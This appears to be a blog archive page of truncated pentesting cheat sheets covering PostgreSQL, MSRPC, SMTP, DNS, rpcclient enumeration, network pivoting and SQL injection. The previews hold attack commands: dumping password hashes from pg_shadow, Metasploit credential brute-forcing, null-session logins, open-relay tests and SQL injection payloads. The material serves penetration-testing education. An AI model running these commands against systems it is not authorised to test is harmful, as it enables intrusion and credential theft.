
Posts

Showing posts from March, 2025

PostgreSQL - Port 5432

PostgreSQL, also known as Postgres, is a powerful open-source object-relational database system. It has earned a strong reputation for its proven architecture, reliability, data integrity, robust feature set, and extensibility.

Identify PostgreSQL
nmap -sV -p 5432 <target-host>

nmap Scanning
nmap -sC -sV --script vuln,vulners --script-args mincvss=7.0 -p5432,5433 -Pn 10.10.10.10 # make sure to check for vulnerable versions
nmap -sV -p 5432 <target-host>

Exploiting Known Vulnerabilities
searchsploit postgresql <version>

Enumerating Databases and Tables
List all databases: \l
Switch to a database: \c <database_name>
List tables in the current database: \dt
Extract data from a specific table: SELECT * FROM <table_name>;

Dumping Hashes
SELECT usename, passwd FROM pg_shadow;

Accessing File System
COPY (SELECT * FROM sensitive_table) TO '/tmp/sensitive_data.txt';

Bruteforcing Postgres Creds
# Using Metasploit
use auxiliary/scanner/postgr...

MSRPC (Microsoft Remote Procedure Call) Pentesting - Port 135

It is also known as a function call or a subroutine call. Default ports are 135, 593.

Enumeration
nmap --script msrpc-enum -p 135 <target-ip>

RPC Endpoints
To enumerate RPC endpoints, use impacket-rpcdump.
impacket-rpcdump -port 135 <target-ip> | grep -E 'MS-EFSRPC|MS-RPRN|MS-PAR'
MS-EFSRPC: It might be vulnerable to PetitPotam.
MS-RPRN, MS-PAR: It might be vulnerable to PrintNightmare.

Metasploit
msfconsole
msf> use auxiliary/scanner/dcerpc/endpoint_mapper
msf> use auxiliary/scanner/dcerpc/hidden
msf> use auxiliary/scanner/dcerpc/management
msf> use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor

Connect
# Anonymous logon
rpcclient -N -U "" <target-ip>
rpcclient -N -U "" -p 593 <target-ip>
rpcclient -N -U "" dc.example.local
# Specify username
# -W: Workgroup
# -N: No password
rpcclient -U username <target-ip>
rpcclient -W WORKGROUP -U username <target-ip>
rpcclient -U username -N <target-ip...

SMTP (Simple Mail Transfer Protocol) Pentesting - Port 25

SMTP (Simple Mail Transfer Protocol) is a communication protocol for electronic mail transmission. It is used for sending e-mail; POP3 or IMAP are used for receiving e-mail. Default ports are 25 (SMTP), 465 (SMTPS), 587 (SMTPS).

Connect
We can use Telnet to connect to the remote server. Here is a command using Telnet:
telnet example.com 25

Enumeration
Identifying an SMTP Server
You can use Nmap to check if there's an SMTP server on a target host like this:
nmap -p25,465,587 -sV -Pn target.com

Additional Nmap commands for enumeration
nmap --script smtp-brute -p 25,465,587 "target-ip"
nmap --script smtp-commands -p 25,465,587 "target-ip"
nmap --script smtp-enum-users -p 25,465,587 "target-ip"
nmap --script smtp-ntlm-info --script-args smtp-ntlm-info.domain=example.com -p 25,465,587 "target-ip"
nmap --script smtp-vuln-cve2011-1764 -p 25,465,587 "target-ip"
nmap --script smtp-* -p 25,465,587 "target-ip"
Enumer...

DNS Pentest - Port 53

Recon
Banner Grabbing - Identify DNS Server Versions
# Use dig to determine DNS server versions
dig version.bind CHAOS TXT @DNS
# Alternatively, use nmap script to grab the banner
nmap --script dns-nsid <DNS_IP>
# Alternatively, use netcat to grab the banner
nc -nv -u <DNS_IP> 53

DNS Server Discovery
# Using dig
dig NS <target-domain>
# Using nslookup
nslookup -type=NS <target-domain>

Enumeration
Using dnsenum
dnsenum --dnsserver <DNS_IP> --enum -p 0 -s 0 -o subdomains.txt -f <WORDLIST> <DOMAIN>

Using dig
# Query DNS records
dig hackviser.com
# Query a specific type of DNS record (e.g., A record)
dig A hackviser.com
# Perform a reverse DNS lookup
dig -x <IP_ADDRESS>
# Query a specific DNS server
dig @<DNS_SERVER_IP> hackviser.com

Using nslookup
# Perform DNS queries
nslookup hackviser.com
# Query a specific type of DNS record (e.g., MX record)
nslookup -type=MX hackviser.com
# Query a specific DNS server
nslookup ha...

RPC Client Enumeration - Port 135

Pivoting for Red Teamers
Using rpcclient via Metasploit for Enumeration & Exploitation
rpcclient is a powerful tool used for enumerating and interacting with Windows RPC services. It is commonly used in penetration testing to extract usernames, groups, and policies from Windows machines.

Using rpcclient Manually (Without Metasploit)
If you already have valid credentials (or null session access), you can use rpcclient from Kali Linux:
rpcclient -U "" <TARGET_IP>
or
rpcclient -U "guest" <TARGET_IP>
🔹 If it prompts for a password, just press Enter to attempt a null session login.

Common Enumeration Commands
enumdomusers # Enumerate domain users
queryuser <RID> # Get user details (Replace <RID> with a user RID)
enumdomgroups # Enumerate groups
querygroup <RID> # Get group details
getsid # Get security identifier (SID)
lookupnames <...

Pivoting Commands

Pivoting in Red Team Operations: A Complete Guide

Introduction
In a real-world red team operation, gaining initial access is just the beginning. The real challenge is pivoting: the ability to move laterally, escalate privileges, and compromise additional systems within the network.

What is Pivoting?
Pivoting is a technique used to route traffic through a compromised host to access internal networks that are not directly reachable.

Types of Pivoting
Network Pivoting: Routes network traffic through a compromised host (e.g., SSH Tunneling, Metasploit, ProxyChains).
Port Forwarding: Exposes specific ports from an internal machine to the attacker (e.g., SSH Local Port Forwarding).

Step 1: Pivoting Using Metasploit
Setting Up a Pivot via Meterpreter
meterpreter> backgroun...

SMTP Pentest Notes - Port 25

SMTP Pentesting Notes
SMTP (Simple Mail Transfer Protocol) is a key component of email communication. Misconfigured SMTP servers can be vulnerable to attacks such as enumeration, open relay abuse, and authentication bypass.

Step 1: Enumerate the SMTP Server
Connect to the SMTP server using Telnet:
telnet <target-ip> 25
Look for the server banner, which may reveal its version and configuration.

Step 2: User Enumeration with VRFY & EXPN
Check if the server allows user verification:
VRFY admin
EXPN postmaster
If valid responses are received, the server is disclosing user accounts, which could aid brute-force attacks.

Step 3: Open Relay Testing
To check if the server allows unauthenticated email forwarding:
MAIL FROM:<attacker@example.com>
RCPT TO:<victim@example.com>
DATA
Subject...

SQLDB Pentest

SQL Database & SQL Injection Pentesting Cheat Sheet
SQL databases store crucial application data, and misconfigurations can make them vulnerable to SQL Injection (SQLi) attacks. This guide covers database enumeration, privilege escalation, and SQL injection techniques.

Step 1: Identifying SQL Database Type
Check the database type by sending payloads in the input fields or URL:
' OR 1=1 -- (MySQL, PostgreSQL, MSSQL)
' UNION SELECT 1,2,3 -- (Check column count)
' AND 1=CONVERT(int,@@version) -- (MSSQL Test)
Observe the error messages for database identification.

Step 2: Enumerating Database Tables & Columns
Use SQL queries to extract database structure. For MySQL:
SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE();
SELECT column_name FROM information_schema.columns WHERE table_name='user...